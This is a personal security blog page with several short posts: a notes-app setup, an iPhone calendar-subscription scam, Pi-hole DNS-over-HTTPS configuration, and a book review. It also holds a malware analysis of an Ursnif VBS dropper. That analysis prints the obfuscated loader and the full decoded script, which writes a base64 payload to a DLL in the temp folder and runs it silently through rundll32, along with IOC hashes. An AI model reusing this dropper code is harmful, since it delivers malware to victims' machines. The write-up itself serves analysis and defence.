Skip to main content

/ˈpeːtər/, n • Security consultant at Atos • Dutch computer geek • Living together with Christina and father of 3 boys • Opinions are my own • He/him

srcr.nl

twitter.com/srcr

reddit.com/u/srcr

paypal.me/srcr

keybase.io/srcr

t.me/srcr

Personal notes migrated to Joplin

1 min read

I was puzzling for a while how to handle my personal notes, primarly in the terminal in the various systems, jsut being able to find certain procedures I use to upgrade which I can't remember from memory.

As an additional issue I still had my personal notes included in Microsoft Onenote and had the notes file stored on my owncloud instance.

So after browsing around I found Joplin which covers most of my needs, the only thing is that Joplin works best if you know Markdown, which basically I do, but this could be a limitation.

So for now this is my personal notes solution having the Windows app installed on 3 workstations, my iPhone and on 2 unix systems. 

This week RFC8996 titled "Deprecating TLS 1.0 and TLS 1.1" was published. Giving software makers the possibility to remove support for these versions from their products. ISC hot take.

As most mornings I listened to the @SANS_ISC StormCast and did some reading up on Flowspec, which is an interesting BGP feature. I really can recommended listening to it - https://isc.sans.edu/podcast.html

Interesting attack vector I wasn't aware of. Abusing iPhone calendar subscriptions for fake antivirus advertisement - https://srcr.nl/2020/iphone-calendar-abuse

iPhone calendar abuse

2 min read

I actually fell for this attack to use the iPhone calendar to create notifications to get me to click on the link. I wasn't aware of this vector before via the iPhone calendar. I know this is done via gmail's calendar.

browsing a littel around I visited a site and got redirected to a web page and it gave me a pop-up to  update my calendar, I was still lying in bed that morning so was not careful with touching the screen so ticked on allow 😒.

I don't use the iPhone internal calendar so was not to worried, and checked it briefly but didn't see anything right away so just parked it in my head as something to look into at a later stage.

fast forward two days and in the evening I get the following pop-up: 

And I remember me allowing the site adding stuff to my calendar. So I decide to check this a little and try to clean-up the mess that was stil pending. So looking at my calendar I see that evening 4 reminders and as you can see in below screenshot 10 additional reminders.

I just updated my iPhone to iOS 13.6 so all known exploits where fixed and I assumed that for this they would probably not going to waste a zeroday on this 😄.

so clicking the link to ofference.club I get the kinda normal scare screen and press Close link

       

And I get the pretty decently created recreated page to install a VPN-app, not sure how that is going to help me with the virus but who cares 🤷

If you click 'verwijder alle virussen' or wait the 2 minutes you get redirected to install the following app. And I assume here the money is created if the app gets installed with there affiliate code they make some money. Interesing detail though is that Savestock is not a VPN are antivirus app.

 

Recovering from this wasn't that big of a deal although I needed to google to find how to remove a calendar subscription. 

"Tap Settings > Accounts & Passwords > Subscribed Calendars" there you find the calendars you are subscribed to. In this case the "CLICK SUBSCRIBE..."

And then delete the account

Just watched this thorough and detailed video about the various features of . I'm looking forward to this so I signed up. If you also are interested in the game my referral link: https://ashesofcreation.com/r/TPGEMES35L5CC22D or the one in the video. - https://youtu.be/1s82xJnx1EY

"Each individual should feel proud and be authentic regardless of there sexual orientation or gender identity. Let's value the contribution of each individual and take pride in working for a company with diversity as a core value." /credit: @MHPietersen

I've just been called a show off by @ranlevi - https://malicious.life/episode/episode-81/ 😊

For anyone using @countercept's Snake malware storeage zoo, I've build a interface scale to connect to @abuse_ch's MalwareBazaar - https://github.com/srcr/malwarebazaar-scale

Short VisualBasic #Ursnif dropper write-up

3 min read

Here is my first post of a short investigation into a malicious script that I came across.

The sample was posted to the URLhaus.abuse.ch list. This is probably part of a phising mail which directs you to download the zip file and open it.

When you do this, the VisualBasic script inside the zip archive will typically be launched and the encoded payload will be executed on the system.

After unzipping we can have a first look at the .vbs script

The malicious script:

  • A large string ending in "AAAAMAAQqVT" I'm already assuming a reversed PE executable, when you base64 encode the MZ header it results in something like TVxx.
  • Two arrays
  • A short code block to decode the array's in something useful
for tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN = lbound(wGPjfJzXJQxGLsJWnaUekdibWhoIi) to ubound(dVMYfYdJEGreGsr) : YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf = chr(sqr(wGPjfJzXJQxGLsJWnaUekdibWhoIi(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN)) - sqr(dVMYfYdJEGreGsr(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN))) : HoVEFmZZVAZqcifFckqTROBxVyUmGActyC = HoVEFmZZVAZqcifFckqTROBxVyUmGActyC & YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf : next : execute(HoVEFmZZVAZqcifFckqTROBxVyUmGActyC)

A little rewriting and making it saver by echo the output instead of execute it, results in the following VBS code :

for Value = lbound(ArrayOne) to ubound(ArrayTwo)
    Result = chr(sqr(ArrayOne(Value)) - sqr(ArrayTwo(Value)))
    ConcatResult = ConcatResult & Result
next
WScript.Echo ConcatResult

Running this result in the following script.

on error resume next
set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Adobe.url"
set oUrlLink = WshShell.CreateShortcut(Path)
oUrlLink.TargetPath = "http://adobe.com"
oUrlLink.Save(A)
if  (FSO.FileExists(Path))  Then
    WScript.Echo "Error!"
else
    xml = "Msxml2.DOMDocument"
    ws = "WScript.Shell"
    bin = "bin.base64"
    sa = "shell.application"
    bs = "base64"
    db = "Adodb.Stream"
    Set wshs = createobject(ws)
    Set sh = createobject(sa)
    filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\SHCSdw.dll"
end if

Set oXML = CreateObject(xml)
Set oNode = oXML.CreateElement(bs)
oNode.dataType = bin
oNode.text = strreverse(code)

Set BinaryStream = CreateObject(db)
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile filepath
sh.ShellExecute "cmd.exe", "/c everybody shit fuck & runDll32 "& filepath &",DllRegisterServer", "", "open", 0

The script places a Adobe.url in the temp folder pointing to http://adobe.com
and it like I already suspected does a string reverse on the code variable - strreverse(code)
passing this via the base64 decoder resullts in a PE executable on the filesystem in your temp folder with the name SHCSdw.dll

The dropped file SHCSdw.dll is a Ursnif sample that was compiled at 2020-02-24 09:57:57, if you can believe this data. The sample is available in Virustotal.

IOC's

File Type sha256
dokument9055.zip Zip archive data bde9ee61351d9c61ddf2e7fc382426a5301f1155e1197f2a3d47468db4486d9c
dokument9055.vbs VisualBasic script 98b3160c553c229cb9be77de3791398aed3cce79e7935d96db9e32bf353b9624
SHCSdw.dll PE32 executable (DLL) bc8da5ad4010226376c376b2d164cfa4e073a0f6ef7761e9f4864a46a8cb9b32

Great thread and dig through by @fs0c131y: In to the creators of the app used to report results during the - https://threadreaderapp.com/thread/1224628685808066565.html

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers by Andy Greenberg

1 min read

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers by Andy Greenberg
My rating: 5 of 5 stars

 

 

It came recommended in the Darknet Diaries Podcast ep 54: Notpetya by Jack Rhysider.
And as far as I'm concerned this is a must read for anyone working in Cybersecurity. It gives so much detail about the Russian government hacking techniques and motivations.
I already knew most of the separate attacks described in the book but getting the big picture how all these are related is an eye opener.

View all my reviews

Word ik wakker met @davemaasland op de TV. Mooi item en inderdaad goed om het groter publiek hier op te wijzen. - https://nos.nl/artikel/2314365-laadpassen-elektrische-auto-s-zijn-moeiteloos-te-kopieren.html

must be underpinned by robust ethics. AI in is as much about what it should do, as what it can do. @ZeinaZakhour discusses the core elements of a security by design approach https://atos.net/en/blog/security-by-design-the-new-cyber-security-paradigm

Stagering numbers, from January to August 2019, around the world, there were more than 518,223 cases of stalkerware precense detected. - https://securelist.com/the-state-of-stalkerware-in-2019/93634

My @UbisoftUplay password was "2e0eTG180rCdigFh" but because you cannot paste it I changed it to "Ubisoft8" /cc @ubisoftsupport

DNS-over-HTTPS in the Pi-hole

1 min read

On the Raspberry pi install the dnss package

apt install dnss

Edit the settings to make it listsn on port 5053, normally it listens on 53

vi /etc/systemd/system/sockets.target.wants/dnss.socket

# Sockets for dnss.
#
# This lets dnss run unprivileged.
# We typically want one UDP and one TCP socket.

[Socket]
ListenDatagram=5053
ListenStream=5053

[Install]
WantedBy=sockets.target

And restart the service, because the pi-hole is running starting probably failed right after installation, port 53 is in use

systemctl restart dnss.socket

In the Pi-hole admin web interface under settings find the tab DNS and adjust the upstream DNS Server to the dnss installation

Pi-Hole - Upstream DNS Servers

And we're good to go. dnss uses by default dns.google.com.

 

 

Attending: Taking Security From Mediocre to Mighty With The MITRE ATT&CK Framework on Brighttalk - https://www.isc2.org/News-and-Events/Webinars/EMEA-Webinars?commid=360733&utm_campaign=Twitter&a...